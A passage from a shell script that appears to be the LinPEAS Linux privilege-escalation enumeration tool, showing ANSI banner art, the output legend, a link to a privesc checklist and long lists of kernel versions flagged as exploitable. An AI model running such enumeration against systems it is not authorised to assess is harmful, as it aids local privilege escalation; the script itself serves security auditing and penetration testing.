\e[48;2;49;75;43m\e[38;2;51;78;45m▄\e[48;2;30;38;27m\e[38;2;39;59;35m▄\e[48;2;63;123;49m\e[38;2;71;110;62m▄\e[48;2;54;121;37m\e[38;2;56;119;40m▄\e[48;2;68;198;37m\e[38;2;60;158;37m▄\e[48;2;73;218;37m\e[38;2;71;216;36m▄\e[48;2;73;217;37m\e[38;2;73;216;38m▄\e[48;2;91;206;58m\e[38;2;110;196;81m▄\e[48;2;122;191;95m\e[38;2;126;188;100m▄\e[48;2;128;186;102m\e[38;2;130;187;104m▄\e[48;2;140;180;116m\e[38;2;128;187;103m▄\e[48;2;126;188;100m\e[38;2;106;197;76m▄\e[48;2;96;202;64m\e[38;2;75;215;39m▄\e[48;2;73;217;37m\e[38;2;72;218;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;74;220;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;74;217;38m\e[38;2;73;217;37m▄\e[48;2;114;194;86m\e[38;2;76;215;40m▄\e[48;2;142;178;121m\e[38;2;94;205;62m▄\e[48;2;150;176;129m\e[38;2;109;196;81m▄\e[48;2;142;180;120m\e[38;2;95;203;63m▄\e[48;2;116;193;88m\e[38;2;76;214;41m▄\e[48;2;78;213;44m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;67;196;36m▄\e[48;2;71;209;37m\e[38;2;60;154;36m▄\e[48;2;59;152;36m\e[38;2;57;138;37m▄\e[48;2;52;110;38m\e[38;2;56;130;37m▄\e[48;2;51;104;38m\e[38;2;30;71;21m▄\e[48;2;20;31;17m\e[38;2;45;69;39m▄\e[48;2;50;78;44m\e[38;2;51;78;45m▄\e[48;2;51;78;45m \e[0m + \e[48;2;51;78;45m\e[38;2;28;43;24m▄\e[48;2;51;78;45m\e[38;2;43;64;38m▄\e[48;2;51;78;45m\e[38;2;52;79;46m▄\e[48;2;34;53;30m\e[38;2;46;71;41m▄\e[48;2;64;124;48m\e[38;2;49;106;36m▄\e[48;2;53;115;38m\e[38;2;57;124;40m▄\e[48;2;63;175;36m\e[38;2;55;126;38m▄\e[48;2;73;217;37m\e[38;2;66;186;36m▄\e[48;2;89;208;56m\e[38;2;73;217;37m▄\e[48;2;111;195;82m\e[38;2;75;215;40m▄\e[48;2;109;197;80m\e[38;2;74;216;38m▄\e[48;2;85;209;52m\e[38;2;73;218;36m▄\e[48;2;73;216;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m\e[38;2;71;214;36m▄\e[48;2;71;212;36m\e[38;2;63;172;36m▄\e[48;2;63;174;35m\e[38;2;57;138;37m▄\e[48;2;58;146;36m\e[38;2;57;137;38m▄\e[48;2;58;139;37m\e[38;2;57;138;37m▄\e[48;2;58;138;37m\e[38;2;54;128;35m▄\e[48;2;50;117;34m\e[38;2;20;44;14m▄\e[48;2;20;32;17m\e[38;2;39;61;34m▄\e[48;2;51;77;44m\e[38;2;45;69;40m▄\e[48;2;51;78;45m\e[38;2;45;69;40m▄\e[48;2;51;78;45m\e[38;2;49;75;43m▄\e[0m + \e[48;2;84;151;67m\e[38;2;98;177;78m▄\e[48;2;43;80;34m\e[38;2;98;177;78m▄\e[48;2;22;39;19m\e[38;2;98;178;78m▄\e[48;2;43;67;38m\e[38;2;81;148;64m▄\e[48;2;40;70;33m\e[38;2;44;78;36m▄\e[48;2;54;127;36m\e[38;2;21;47;15m▄\e[48;2;55;120;39m\e[38;2;54;117;39m▄\e[48;2;56;133;37m\e[38;2;59;133;40m▄\e[48;2;71;211;36m\e[38;2;61;164;37m▄\e[48;2;73;217;36m\e[38;2;71;211;36m▄\e[48;2;73;218;37m\e[38;2;72;218;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;72;217;36m▄\e[48;2;73;218;37m\e[38;2;67;203;34m▄\e[48;2;68;194;37m\e[38;2;40;116;21m▄\e[48;2;58;142;36m\e[38;2;8;21;5m▄\e[48;2;49;120;31m\e[38;2;6;10;5m▄\e[48;2;25;59;16m\e[38;2;73;108;65m▄\e[48;2;15;33;11m\e[38;2;95;157;79m▄\e[48;2;12;25;9m\e[38;2;97;175;77m▄\e[48;2;21;32;19m\e[38;2;99;179;79m▄\e[48;2;23;35;19m\e[38;2;98;178;78m▄\e[48;2;20;34;17m\e[38;2;98;178;78m▄\e[48;2;13;24;11m\e[38;2;98;178;78m▄\e[48;2;16;26;14m\e[38;2;98;177;78m▄\e[0m + \e[48;2;97;176;77m\e[38;2;58;103;46m▄\e[48;2;98;177;78m\e[38;2;94;170;75m▄\e[48;2;98;177;78m\e[38;2;99;179;79m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;97;176;77m\e[38;2;98;177;78m▄\e[48;2;91;165;72m\e[38;2;98;177;78m▄\e[48;2;55;100;44m\e[38;2;98;177;78m▄\e[48;2;15;27;10m\e[38;2;92;168;73m▄\e[48;2;24;46;18m\e[38;2;76;138;61m▄\e[48;2;73;154;53m\e[38;2;54;96;43m▄\e[48;2;74;213;39m\e[38;2;24;48;18m▄\e[48;2;74;222;37m\e[38;2;20;55;11m▄\e[48;2;73;217;37m\e[38;2;31;91;16m▄\e[48;2;73;218;37m\e[38;2;49;145;24m▄\e[48;2;73;218;37m\e[38;2;68;201;35m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;74;220;37m▄\e[48;2;73;218;37m\e[38;2;73;219;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;73;220;37m▄\e[48;2;73;218;37m\e[38;2;72;214;37m▄\e[48;2;73;218;37m\e[38;2;63;187;32m▄\e[48;2;72;217;36m\e[38;2;41;120;22m▄\e[48;2;74;222;36m\e[38;2;21;52;13m▄\e[48;2;67;203;34m\e[38;2;39;62;34m▄\e[48;2;40;117;21m\e[38;2;64;103;54m▄\e[48;2;14;43;7m\e[38;2;72;126;57m▄\e[48;2;4;12;2m\e[38;2;87;156;69m▄\e[48;2;25;45;21m\e[38;2;97;174;78m▄\e[48;2;71;124;57m\e[38;2;99;177;80m▄\e[48;2;97;168;78m\e[38;2;94;170;75m▄\e[48;2;96;175;77m\e[38;2;103;177;84m▄\e[48;2;98;176;79m\e[38;2;109;183;90m▄\e[48;2;100;178;80m\e[38;2;112;185;94m▄\e[48;2;100;177;80m\e[38;2;111;184;92m▄\e[48;2;99;177;80m\e[38;2;107;182;89m▄\e[48;2;98;177;78m\e[38;2;105;182;85m▄\e[48;2;98;177;78m\e[38;2;103;180;83m▄\e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[0m + \e[48;2;99;106;96m\e[38;2;254;254;254m▄\e[48;2;54;79;47m\e[38;2;236;236;236m▄\e[48;2;72;123;60m\e[38;2;134;134;134m▄\e[48;2;97;176;78m\e[38;2;65;87;60m▄\e[48;2;98;177;78m\e[38;2;73;130;59m▄\e[48;2;98;177;78m\e[38;2;91;165;72m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;96;172;77m\e[38;2;98;177;78m▄\e[48;2;82;147;65m\e[38;2;98;177;78m▄\e[48;2;66;116;52m\e[38;2;98;177;78m▄\e[48;2;46;78;38m\e[38;2;98;177;78m▄\e[48;2;27;51;20m\e[38;2;98;177;78m▄\e[48;2;28;60;20m\e[38;2;94;169;74m▄\e[48;2;28;67;19m\e[38;2;86;155;69m▄\e[48;2;34;96;19m\e[38;2;69;123;54m▄\e[48;2;42;126;21m\e[38;2;48;86;39m▄\e[48;2;51;148;27m\e[38;2;36;64;28m▄\e[48;2;55;164;28m\e[38;2;26;46;20m▄\e[48;2;60;180;30m\e[38;2;23;39;18m▄\e[48;2;62;186;31m\e[38;2;21;40;17m▄\e[48;2;61;181;31m\e[38;2;19;36;16m▄\e[48;2;67;176;40m\e[38;2;18;32;14m▄\e[48;2;63;173;35m\e[38;2;23;36;19m▄\e[48;2;56;168;29m\e[38;2;27;42;23m▄\e[48;2;53;160;27m\e[38;2;29;45;24m▄\e[48;2;44;133;22m\e[38;2;30;53;25m▄\e[48;2;34;102;17m\e[38;2;52;89;43m▄\e[48;2;20;60;10m\e[38;2;88;148;71m▄\e[48;2;24;47;19m\e[38;2;97;171;78m▄\e[48;2;34;62;27m\e[38;2;98;177;78m▄\e[48;2;55;99;44m\e[38;2;98;177;78m▄\e[48;2;80;144;64m\e[38;2;98;177;78m▄\e[48;2;99;176;79m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[48;2;99;177;79m\e[38;2;96;172;76m▄\e[48;2;99;175;79m\e[38;2;85;151;68m▄\e[48;2;95;169;76m\e[38;2;72;121;60m▄\e[48;2;109;180;92m\e[38;2;37;57;32m▄\e[48;2;100;159;85m\e[38;2;38;41;36m▄\e[48;2;72;107;62m\e[38;2;74;74;74m▄\e[48;2;44;65;38m\e[38;2;134;134;134m▄\e[48;2;31;48;27m\e[38;2;200;200;200m▄\e[48;2;31;48;26m\e[38;2;226;226;226m▄\e[48;2;31;52;25m\e[38;2;205;205;205m▄\e[48;2;41;71;34m\e[38;2;170;170;170m▄\e[48;2;59;97;50m\e[38;2;142;142;142m▄\e[0m + \e[48;2;95;106;94m\e[38;2;253;253;253m▄\e[48;2;81;137;65m\e[38;2;243;243;243m▄\e[48;2;91;166;73m\e[38;2;182;185;181m▄\e[48;2;95;174;76m\e[38;2;61;73;59m▄\e[48;2;98;177;78m\e[38;2;33;66;26m▄\e[48;2;98;177;78m\e[38;2;81;143;65m▄\e[48;2;98;177;78m\e[38;2;102;182;81m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;99;179;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;97;177;77m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m\e[38;2;99;179;78m▄\e[48;2;98;177;78m\e[38;2;93;169;74m▄\e[48;2;98;177;78m\e[38;2;56;106;44m▄\e[48;2;96;174;77m\e[38;2;16;31;13m▄\e[48;2;68;126;54m\e[38;2;58;58;58m▄\e[48;2;28;50;23m\e[38;2;180;180;180m▄\e[48;2;20;22;20m\e[38;2;240;240;240m▄\e[48;2;86;85;86m\e[38;2;253;253;253m▄\e[48;2;199;199;199m\e[38;2;255;255;255m▄ \e[0m + \e[48;2;146;147;145m\e[38;2;254;254;254m▄\e[48;2;41;52;39m\e[38;2;242;242;242m▄\e[48;2;39;76;30m\e[38;2;192;192;192m▄\e[48;2;73;136;57m\e[38;2;132;134;132m▄\e[48;2;90;162;72m\e[38;2;96;100;95m▄\e[48;2;99;175;79m\e[38;2;60;69;58m▄\e[48;2;98;177;78m\e[38;2;46;59;43m▄\e[48;2;98;177;78m\e[38;2;32;51;27m▄\e[48;2;98;178;78m\e[38;2;28;50;23m▄\e[48;2;98;178;78m\e[38;2;28;55;22m▄\e[48;2;98;178;78m\e[38;2;35;64;28m▄\e[48;2;98;177;78m\e[38;2;41;75;33m▄\e[48;2;98;177;78m\e[38;2;50;89;41m▄\e[48;2;98;177;77m\e[38;2;54;89;45m▄\e[48;2;98;177;77m\e[38;2;53;89;44m▄\e[48;2;98;177;78m\e[38;2;49;86;39m▄\e[48;2;98;177;78m\e[38;2;45;83;36m▄\e[48;2;98;177;78m\e[38;2;40;74;32m▄\e[48;2;98;177;78m\e[38;2;35;64;28m▄\e[48;2;98;178;78m\e[38;2;39;60;33m▄\e[48;2;90;163;71m\e[38;2;55;61;53m▄\e[48;2;53;97;41m\e[38;2;111;111;111m▄\e[48;2;24;44;19m\e[38;2;186;186;186m▄\e[48;2;36;41;35m\e[38;2;242;242;242m▄\e[48;2;132;131;132m\e[38;2;255;255;255m▄\e[0m + '"; + + else + echo " \e[48;5;108m \e[48;5;59m \e[48;5;71m \e[48;5;77m \e[48;5;22m \e[48;5;108m \e[48;5;114m \e[48;5;59m \e[49m + \e[48;5;108m \e[48;5;71m \e[48;5;22m \e[48;5;113m \e[48;5;71m \e[48;5;94m \e[48;5;214m \e[48;5;58m \e[48;5;214m \e[48;5;100m \e[48;5;71m \e[48;5;16m \e[48;5;108m \e[49m + \e[48;5;65m \e[48;5;16m \e[48;5;22m \e[48;5;214m \e[48;5;16m \e[48;5;214m \e[48;5;65m \e[49m + \e[48;5;65m \e[48;5;214m \e[48;5;16m \e[48;5;214m \e[48;5;16m \e[48;5;214m \e[48;5;136m \e[48;5;65m \e[49m + \e[48;5;23m \e[48;5;214m \e[48;5;178m \e[48;5;214m \e[48;5;65m \e[49m + \e[48;5;16m \e[48;5;214m \e[48;5;136m \e[48;5;94m \e[48;5;136m \e[48;5;214m \e[48;5;65m \e[49m + \e[48;5;58m \e[48;5;214m \e[48;5;172m \e[48;5;64m \e[48;5;77m \e[48;5;71m \e[48;5;65m \e[49m + \e[48;5;16m \e[48;5;71m \e[48;5;77m \e[48;5;71m \e[48;5;77m \e[48;5;71m \e[48;5;77m \e[48;5;65m \e[49m + \e[48;5;59m \e[48;5;71m \e[48;5;77m \e[48;5;77m \e[48;5;16m \e[48;5;77m \e[48;5;16m \e[48;5;77m \e[48;5;65m \e[49m + \e[48;5;65m \e[48;5;77m \e[48;5;71m \e[48;5;16m \e[48;5;77m \e[48;5;113m \e[48;5;77m \e[48;5;65m \e[49m + \e[48;5;65m \e[48;5;16m \e[48;5;77m \e[48;5;150m \e[48;5;113m \e[48;5;77m \e[48;5;150m \e[48;5;113m \e[48;5;77m \e[48;5;65m \e[48;5;59m \e[48;5;65m \e[49m + \e[48;5;16m \e[48;5;65m \e[48;5;71m \e[48;5;77m \e[48;5;71m \e[48;5;22m \e[48;5;65m \e[49m + \e[48;5;108m \e[48;5;107m \e[48;5;59m \e[48;5;77m \e[48;5;16m \e[48;5;114m \e[48;5;108m \e[49m" + fi + fi +} + + +########################################### +#-----------) Starting Output (-----------# +########################################### + +echo "" +if [ !"$QUIET" ]; then print_banner; fi +printf ${BLUE}" $SCRIPTNAME-$VERSION ${YELLOW}by carlospolop\n"$NC; +echo "" +printf ${YELLOW}"ADVISORY: "${BLUE}"$ADVISORY\n"$NC +echo "" +printf ${BLUE}"Linux Privesc Checklist: "${YELLOW}"https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist\n"$NC +echo " LEGEND:" | sed "s,LEGEND,${C}[1;4m&${C}[0m," +echo " RED/YELLOW: 95% a PE vector" | sed "s,RED/YELLOW,${SED_RED_YELLOW}," +echo " RED: You should take a look to it" | sed "s,RED,${SED_RED}," +echo " LightCyan: Users with console" | sed "s,LightCyan,${C}[1;96m&${C}[0m," +echo " Blue: Users without console & mounted devs" | sed "s,Blue,${SED_BLUE}," +echo " Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) " | sed "s,Green,${SED_GREEN}," +echo " LightMagenta: Your username" | sed "s,LightMagenta,${C}[1;95m&${C}[0m," +if [ "$IAMROOT" ]; then + echo "" + echo " YOU ARE ALREADY ROOT!!! (it could take longer to complete execution)" | sed "s,YOU ARE ALREADY ROOT!!!,${SED_RED_YELLOW}," + sleep 3 +fi +echo "" +printf " ${DG}Starting $SCRIPTNAME. Caching Writable Folders...$NC" +echo "" + +########################################### +#---------------) Lists (-----------------# +########################################### + +filename="$SCRIPTNAME.txt$RANDOM" +kernelB=" 4.0.[0-9]+| 4.1.[0-9]+| 4.2.[0-9]+| 4.3.[0-9]+| 4.4.[0-9]+| 4.5.[0-9]+| 4.6.[0-9]+| 4.7.[0-9]+| 4.8.[0-9]+| 4.9.[0-9]+| 4.10.[0-9]+| 4.11.[0-9]+| 4.12.[0-9]+| 4.13.[0-9]+| 3.9.6| 3.9.0| 3.9| 3.8.9| 3.8.8| 3.8.7| 3.8.6| 3.8.5| 3.8.4| 3.8.3| 3.8.2| 3.8.1| 3.8.0| 3.8| 3.7.6| 3.7.0| 3.7| 3.6.0| 3.6| 3.5.0| 3.5| 3.4.9| 3.4.8| 3.4.6| 3.4.5| 3.4.4| 3.4.3| 3.4.2| 3.4.1| 3.4.0| 3.4| 3.3| 3.2| 3.19.0| 3.16.0| 3.15| 3.14| 3.13.1| 3.13.0| 3.13| 3.12.0| 3.12| 3.11.0| 3.11| 3.10.6| 3.10.0| 3.10| 3.1.0| 3.0.6| 3.0.5| 3.0.4| 3.0.3| 3.0.2| 3.0.1| 3.0.0| 2.6.9| 2.6.8| 2.6.7| 2.6.6| 2.6.5| 2.6.4| 2.6.39| 2.6.38| 2.6.37| 2.6.36| 2.6.35| 2.6.34| 2.6.33| 2.6.32| 2.6.31| 2.6.30| 2.6.3| 2.6.29| 2.6.28| 2.6.27| 2.6.26| 2.6.25| 2.6.24.1| 2.6.24| 2.6.23| 2.6.22| 2.6.21| 2.6.20| 2.6.2| 2.6.19| 2.6.18| 2.6.17| 2.6.16| 2.6.15| 2.6.14| 2.6.13| 2.6.12| 2.6.11| 2.6.10| 2.6.1| 2.6.0| 2.4.9| 2.4.8| 2.4.7| 2.4.6| 2.4.5| 2.4.4| 2.4.37| 2.4.36| 2.4.35| 2.4.34| 2.4.33| 2.4.32| 2.4.31| 2.4.30| 2.4.29| 2.4.28| 2.4.27| 2.4.26| 2.4.25| 2.4.24| 2.4.23| 2.4.22| 2.4.21| 2.4.20| 2.4.19| 2.4.18| 2.4.17| 2.4.16| 2.4.15| 2.4.14| 2.4.13| 2.4.12| 2.4.11| 2.4.10| 2.2.24" +kernelDCW_Ubuntu_Precise_1="3.1.1-1400-linaro-lt-mx5|3.11.0-13-generic|3.11.0-14-generic|3.11.0-15-generic|3.11.0-17-generic|3.11.0-18-generic|3.11.0-20-generic|3.11.0-22-generic|3.11.0-23-generic|3.11.0-24-generic|3.11.0-26-generic|3.13.0-100-generic|3.13.0-24-generic|3.13.0-27-generic|3.13.0-29-generic|3.13.0-30-generic|3.13.0-32-generic|3.13.0-33-generic|3.13.0-34-generic|3.13.0-35-generic|3.13.0-36-generic|3.13.0-37-generic|3.13.0-39-generic|3.13.0-40-generic|3.13.0-41-generic|3.13.0-43-generic|3.13.0-44-generic|3.13.0-46-generic|3.13.0-48-generic|3.13.0-49-generic|3.13.0-51-generic|3.13.0-52-generic|3.13.0-53-generic|3.13.0-54-generic|3.13.0-55-generic|3.13.0-57-generic|3.13.0-58-generic|3.13.0-59-generic|3.13.0-61-generic|3.13.0-62-generic|3.13.0-63-generic|3.13.0-65-generic|3.13.0-66-generic|3.13.0-67-generic|3.13.0-68-generic|3.13.0-71-generic|3.13.0-73-generic|3.13.0-74-generic|3.13.0-76-generic|3.13.0-77-generic|3.13.0-79-generic|3.13.0-83-generic|3.13.0-85-generic|3.13.0-86-generic|3.13.0-88-generic|3.13.0-91-generic|3.13.0-92-generic|3.13.0-93-generic|3.13.0-95-generic|3.13.0-96-generic|3.13.0-98-generic|3.2.0-101-generic|3.2.0-101-generic-pae|3.2.0-101-virtual|3.2.0-102-generic|3.2.0-102-generic-pae|3.2.0-102-virtual" +kernelDCW_Ubuntu_Precise_2="3.2.0-104-generic|3.2.0-104-generic-pae|3.2.0-104-virtual|3.2.0-105-generic|3.2.0-105-generic-pae|3.2.0-105-virtual|3.2.0-106-generic|3.2.0-106-generic-pae|3.2.0-106-virtual|3.2.0-107-generic|3.2.0-107-generic-pae|3.2.0-107-virtual|3.2.0-109-generic|3.2.0-109-generic-pae|3.2.0-109-virtual|3.2.0-110-generic|3.2.0-110-generic-pae|3.2.0-110-virtual|3.2.0-111-generic|3.2.0-111-generic-pae|3.2.0-111-virtual|3.2.0-1412-omap4|3.2.0-1602-armadaxp|3.2.0-23-generic|3.2.0-23-generic-pae|3.2.0-23-lowlatency|3.2.0-23-lowlatency-pae|3.2.0-23-omap|3.2.0-23-powerpc-smp|3.2.0-23-powerpc64-smp|3.2.0-23-virtual|3.2.0-24-generic|3.2.0-24-generic-pae|3.2.0-24-virtual|3.2.0-25-generic|3.2.0-25-generic-pae|3.2.0-25-virtual|3.2.0-26-generic|3.2.0-26-generic-pae|3.2.0-26-virtual|3.2.0-27-generic|3.2.0-27-generic-pae|3.2.0-27-virtual|3.2.0-29-generic|3.2.0-29-generic-pae|3.2.0-29-virtual|3.2.0-31-generic|3.2.0-31-generic-pae|3.2.0-31-virtual|3.2.0-32-generic|3.2.0-32-generic-pae|3.2.0-32-virtual|3.2.0-33-generic|3.2.0-33-generic-pae|3.2.0-33-lowlatency|3.2.0-33-lowlatency-pae|3.2.0-33-virtual|3.2.0-34-generic|3.2.0-34-generic-pae|3.2.0-34-virtual|3.2.0-35-generic|3.2.0-35-generic-pae|3.2.0-35-lowlatency|3.2.0-35-lowlatency-pae|3.2.0-35-virtual" +kernelDCW_Ubuntu_Precise_3="3.2.0-36-generic|3.2.0-36-generic-pae|3.2.0-36-lowlatency|3.2.0-36-lowlatency-pae|3.2.0-36-virtual|3.2.0-37-generic|3.2.0-37-generic-pae|3.2.0-37-lowlatency|3.2.0-37-lowlatency-pae|3.2.0-37-virtual|3.2.0-38-generic|3.2.0-38-generic-pae|3.2.0-38-lowlatency|3.2.0-38-lowlatency-pae|3.2.0-38-virtual|3.2.0-39-generic|3.2.0-39-generic-pae|3.2.0-39-lowlatency|3.2.0-39-lowlatency-pae|3.2.0-39-virtual|3.2.0-40-generic|3.2.0-40-generic-pae|3.2.0-40-lowlatency|3.2.0-40-lowlatency-pae|3.2.0-40-virtual|3.2.0-41-generic|3.2.0-41-generic-pae|3.2.0-41-lowlatency|3.2.0-41-lowlatency-pae|3.2.0-41-virtual|3.2.0-43-generic|3.2.0-43-generic-pae|3.2.0-43-virtual|3.2.0-44-generic|3.2.0-44-generic-pae|3.2.0-44-lowlatency|3.2.0-44-lowlatency-pae|3.2.0-44-virtual|3.2.0-45-generic|3.2.0-45-generic-pae|3.2.0-45-virtual|3.2.0-48-generic|3.2.0-48-generic-pae|3.2.0-48-lowlatency|3.2.0-48-lowlatency-pae|3.2.0-48-virtual|3.2.0-51-generic|3.2.0-51-generic-pae|3.2.0-51-lowlatency|3.2.0-51-lowlatency-pae|3.2.0-51-virtual|3.2.0-52-generic|3.2.0-52-generic-pae|3.2.0-52-lowlatency|3.2.0-52-lowlatency-pae|3.2.0-52-virtual|3.2.0-53-generic" +kernelDCW_Ubuntu_Precise_4="3.2.0-53-generic-pae|3.2.0-53-lowlatency|3.2.0-53-lowlatency-pae|3.2.0-53-virtual|3.2.0-54-generic|3.2.0-54-generic-pae|3.2.0-54-lowlatency|3.2.0-54-lowlatency-pae|3.2.0-54-virtual|3.2.0-55-generic|3.2.0-55-generic-pae|3.2.0-55-lowlatency|3.2.0-55-lowlatency-pae|3.2.0-55-virtual|3.2.0-56-generic|3.2.0-56-generic-pae|3.2.0-56-lowlatency|3.2.0-56-lowlatency-pae|3.2.0-56-virtual|3.2.0-57-generic|3.2.0-57-generic-pae|3.2.0-57-lowlatency|3.2.0-57-lowlatency-pae|3.2.0-57-virtual|3.2.0-58-generic|3.2.0-58-generic-pae|3.2.0-58-lowlatency|3.2.0-58-lowlatency-pae|3.2.0-58-virtual|3.2.0-59-generic|3.2.0-59-generic-pae|3.2.0-59-lowlatency|3.2.0-59-lowlatency-pae|3.2.0-59-virtual|3.2.0-60-generic|3.2.0-60-generic-pae|3.2.0-60-lowlatency|3.2.0-60-lowlatency-pae|3.2.0-60-virtual|3.2.0-61-generic|3.2.0-61-generic-pae|3.2.0-61-virtual|3.2.0-63-generic|3.2.0-63-generic-pae|3.2.0-63-lowlatency|3.2.0-63-lowlatency-pae|3.2.0-63-virtual|3.2.0-64-generic|3.2.0-64-generic-pae|3.2.0-64-lowlatency|3.2.0-64-lowlatency-pae|3.2.0-64-virtual|3.2.0-65-generic|3.2.0-65-generic-pae|3.2.0-65-lowlatency|3.2.0-65-lowlatency-pae|3.2.0-65-virtual|3.2.0-67-generic|3.2.0-67-generic-pae|3.2.0-67-lowlatency|3.2.0-67-lowlatency-pae|3.2.0-67-virtual|3.2.0-68-generic" +kernelDCW_Ubuntu_Precise_5="3.2.0-68-generic-pae|3.2.0-68-lowlatency|3.2.0-68-lowlatency-pae|3.2.0-68-virtual|3.2.0-69-generic|3.2.0-69-generic-pae|3.2.0-69-lowlatency|3.2.0-69-lowlatency-pae|3.2.0-69-virtual|3.2.0-70-generic|3.2.0-70-generic-pae|3.2.0-70-lowlatency|3.2.0-70-lowlatency-pae|3.2.0-70-virtual|3.2.0-72-generic|3.2.0-72-generic-pae|3.2.0-72-lowlatency|3.2.0-72-lowlatency-pae|3.2.0-72-virtual|3.2.0-73-generic|3.2.0-73-generic-pae|3.2.0-73-lowlatency|3.2.0-73-lowlatency-pae|3.2.0-73-virtual|3.2.0-74-generic|3.2.0-74-generic-pae|3.2.0-74-lowlatency|3.2.0-74-lowlatency-pae|3.2.0-74-virtual|3.2.0-75-generic|3.2.0-75-generic-pae|3.2.0-75-lowlatency|3.2.0-75-lowlatency-pae|3.2.0-75-virtual|3.2.0-76-generic|3.2.0-76-generic-pae|3.2.0-76-lowlatency|3.2.0-76-lowlatency-pae|3.2.0-76-virtual|3.2.0-77-generic|3.2.0-77-generic-pae|3.2.0-77-lowlatency|3.2.0-77-lowlatency-pae|3.2.0-77-virtual|3.2.0-79-generic|3.2.0-79-generic-pae|3.2.0-79-lowlatency|3.2.0-79-lowlatency-pae|3.2.0-79-virtual|3.2.0-80-generic|3.2.0-80-generic-pae|3.2.0-80-lowlatency|3.2.0-80-lowlatency-pae|3.2.0-80-virtual|3.2.0-82-generic|3.2.0-82-generic-pae|3.2.0-82-lowlatency|3.2.0-82-lowlatency-pae|3.2.0-82-virtual|3.2.0-83-generic|3.2.0-83-generic-pae|3.2.0-83-virtual|3.2.0-84-generic" +kernelDCW_Ubuntu_Precise_6="3.2.0-84-generic-pae|3.2.0-84-virtual|3.2.0-85-generic|3.2.0-85-generic-pae|3.2.0-85-virtual|3.2.0-86-generic|3.2.0-86-generic-pae|3.2.0-86-virtual|3.2.0-87-generic|3.2.0-87-generic-pae|3.2.0-87-virtual|3.2.0-88-generic|3.2.0-88-generic-pae|3.2.0-88-virtual|3.2.0-89-generic|3.2.0-89-generic-pae|3.2.0-89-virtual|3.2.0-90-generic|3.2.0-90-generic-pae|3.2.0-90-virtual|3.2.0-91-generic|3.2.0-91-generic-pae|3.2.0-91-virtual|3.2.0-92-generic|3.2.0-92-generic-pae|3.2.0-92-virtual|3.2.0-93-generic|3.2.0-93-generic-pae|3.2.0-93-virtual|3.2.0-94-generic|3.2.0-94-generic-pae|3.2.0-94-virtual|3.2.0-95-generic|3.2.0-95-generic-pae|3.2.0-95-virtual|3.2.0-96-generic|3.2.0-96-generic-pae|3.2.0-96-virtual|3.2.0-97-generic|3.2.0-97-generic-pae|3.2.0-97-virtual|3.2.0-98-generic|3.2.0-98-generic-pae|3.2.0-98-virtual|3.2.0-99-generic|3.2.0-99-generic-pae|3.2.0-99-virtual|3.5.0-40-generic|3.5.0-41-generic|3.5.0-42-generic|3.5.0-43-generic|3.5.0-44